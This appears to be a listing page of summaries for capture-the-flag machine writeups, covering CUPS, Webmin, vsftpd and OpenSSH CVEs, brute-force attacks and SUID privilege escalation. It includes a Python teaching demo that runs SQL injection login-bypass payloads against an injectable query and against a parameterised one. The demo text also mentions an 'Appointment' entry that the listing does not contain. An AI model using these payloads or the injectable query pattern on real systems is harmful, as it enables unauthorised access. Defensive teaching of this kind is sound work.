    EvilCUPS - CUPS Vulnerability Chaining (CVEs) and Local Credential Compromise

    Technical writeup detailing the compromise of the EvilCUPS machine. Initial access is achieved by exploiting a chain of CUPS vulnerabilities (including CVE-2024-47176, CVE-2024-47076, CVE-2024-47175, CVE-2024-47177) to gain Remote Code Execution (RCE) as the 'lp' user. Local privilege escalation is then performed by manually enumerating the CUPS spool directory (/var/spool/cups) to extract cleartext credentials for the root user.

    CTF-Writeup Remote-Code-Execution Privilege-Escalation
  • 2024-10-15

    Source - Webmin 1.890 RCE (CVE-2019-15107) Exploitation

    Technical writeup detailing the immediate compromise of the Source machine by exploiting the Webmin service running on port 10000. The vulnerability leveraged is the unauthenticated Remote Code Execution (RCE) backdoor present in Webmin versions 1.882 through 1.921 (CVE-2019-15107). Exploitation is achieved by running a public exploit to gain direct root access and establishing a reverse shell for full system control.

    CTF-Writeup Remote-Code-Execution Linux-Services
  • 2024-10-11

    TickTackRoot - FTP Anonymous, SSH Brute-Force, and SUID Binary Exploitation

    Technical writeup detailing the compromise of the TickTackRoot machine. The path includes initial enumeration of open services (21/FTP, 22/SSH, 80/HTTP). Access is gained by leveraging Anonymous FTP login to find potential usernames, followed by a successful SSH brute-force attack using Hydra. Privilege escalation is achieved by exploiting the SUID binary 'timeout_suid' to gain a root shell, demonstrating a classic Linux privilege escalation technique.

    CTF-Writeup Network-Exploitation Linux-Privesc
  • 2024-10-09

    BreakMySSH - Exploiting OpenSSH CVE-2018-15473 for Root Access

    Technical writeup detailing the compromise of the BreakMySSH challenge. Methodology covers Nmap scanning, exploiting the OpenSSH 7.7 Username Enumeration vulnerability (CVE-2018-15473) to identify a valid user, followed by a targeted password brute-force attack using Hydra to gain root access.

    CTF-Writeup Vulnerability-Exploitation Network-Security
  • 2024-10-01

    WalkingCMS - WordPress Exploitation via Theme Editor and SUID Privilege Escalation

    Technical writeup detailing the compromise of the WalkingCMS challenge. Initial access involves enumerating a WordPress installation via Gobuster, credential cracking using WPScan, and achieving a reverse shell by modifying the theme's index.php file. Final root access is achieved by exploiting a vulnerable SUID binary, '/usr/bin/env', using standard Linux privilege escalation techniques.

    CTF-Writeup Web-Exploitation Linux-Privesc
  • 2024-09-18

    Injection - SQLi Authentication Bypass and SUID Privilege Escalation

    Technical writeup covering the compromise of the 'Injection' challenge. Methodology includes port scanning, exploitation of a SQL Injection vulnerability for authentication bypass (' OR 1=1-- -), securing initial access via SSH, and leveraging a vulnerable SUID binary ('env') via GTFObins for root privilege escalation.

    CTF-Writeup Web-Vulnerabilities Linux-Privesc
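The two authentication-bypass payloads on this page, admin'# in the Appointment entry and ' OR 1=1-- - in this one, work for the same reason: the login query is assembled from strings. The block below is an added example for this listing, not code from either challenge: it runs an in-memory SQLite database with constructed accounts, shows the string-built query beside its parameterised replacement, and uses the -- comment form because # is a MySQL-only comment marker that SQLite does not accept. Passwords are stored in clear only to keep the demo short; a real login table holds password hashes.

```python
"""Login query: string-built (injectable) beside parameterised, run against an in-memory SQLite database."""
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password TEXT)")
    # constructed accounts; plaintext passwords only so the example stays short
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "Adm1n!Pass"), ("guest", "guest")])
    return conn


def login_vulnerable(conn, username: str, password: str):
    # Attacker input is spliced into the SQL text: a quote ends the literal and
    # '--' comments out the password comparison (or OR 1=1 makes the WHERE clause true).
    query = f"SELECT username FROM users WHERE username = '{username}' AND password = '{password}'"
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username: str, password: str):
    # Placeholders send the values separately from the SQL text, so the quote and the
    # comment marker are ordinary characters inside a string value.
    row = conn.execute("SELECT username FROM users WHERE username = ? AND password = ?",
                       (username, password)).fetchone()
    return row[0] if row else None


PAYLOADS = {
    "comment out password check": ("admin'--", "anything"),
    "tautology":                  ("' OR 1=1-- -", "anything"),
}


def demo():
    """Map each payload to (result from the injectable login, result from the safe login)."""
    conn = make_db()
    return {name: (login_vulnerable(conn, u, p), login_safe(conn, u, p))
            for name, (u, p) in PAYLOADS.items()}


if __name__ == "__main__":
    for name, (vuln, safe) in demo().items():
        print(f"{name}: vulnerable -> {vuln!r}, parameterised -> {safe!r}")
```

The tautology payload logs in as whichever user the database returns first (here 'admin', the lowest id), which is why a blind OR 1=1 often lands on the most privileged account.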
  • 2024-09-17

    Trust - SSH Brute-Force and Vim Sudo Privilege Escalation

    Technical writeup detailing the compromise of the 'Trust' challenge. Methodology includes Nmap scanning and web fuzzing via Gobuster to identify hidden resources, a targeted Hydra brute-force attack to obtain SSH credentials, and final privilege escalation by exploiting the NOPASSWD sudo permission on the Vim binary.

    CTF-Writeup Network-Security Linux-Privesc
  • 2024-09-16

    FirstHacking - Exploiting vsftpd 2.3.4 Backdoor (CVE-2011-2523)

    Technical writeup demonstrating the exploitation of the vsftpd 2.3.4 backdoor (CVE-2011-2523) vulnerability on a DockerLabs environment. Methodology covers Nmap service detection, exploit identification via Searchsploit, remote command execution via the FTP service, and achieving immediate root access.

    CTF-Writeup Vulnerability-Exploitation Network-Security
  • 2024-09-05

    Dancing - Exploiting Unauthenticated SMB Shares

    Technical writeup detailing the initial compromise of the Dancing machine. The methodology focuses on thorough Nmap scanning to identify exposed SMB services (ports 139, 445), leveraging the 'smbclient' tool to enumerate and gain unauthorized access to publicly accessible network shares (WorkShares), and retrieving sensitive data (flags/notes) due to weak share permissions.

    CTF-Writeup Network-Exploitation Windows-Services
  • 2024-09-05

    Redeemer - Exploiting Unauthenticated Redis Access

    Technical writeup detailing the compromise of the Redeemer machine. The methodology focuses on Nmap scanning to identify the exposed Redis service on port 6379, exploiting the lack of required authentication to connect directly using 'redis-cli', enumerating the key-value store with INFO and KEYS *, and retrieving the flag.

    CTF-Writeup Network-Exploitation Linux-Services
  • 2024-09-04

    Fawn - Exploiting Anonymous FTP Login

    Technical writeup detailing the compromise of the Fawn machine. The methodology focuses on Nmap scanning to identify the exposed FTP service (vsftpd 3.0.3) on port 21, exploiting the 'Anonymous FTP Login Allowed' setting to gain unauthenticated access, and retrieving the flag via standard FTP file transfer protocols.

    CTF-Writeup Network-Exploitation Linux-Services
  • 2024-09-03

    Meow - Exploiting Weak Credentials via Telnet (Port 23)

    Technical writeup detailing the compromise of the Meow machine. The methodology involves Nmap scanning to identify the exposed Telnet service on port 23 and exploiting weak credentials (the root account accepts a login with an empty password) to gain immediate root control and retrieve the flag.

    CTF-Writeup Network-Exploitation Very-Easy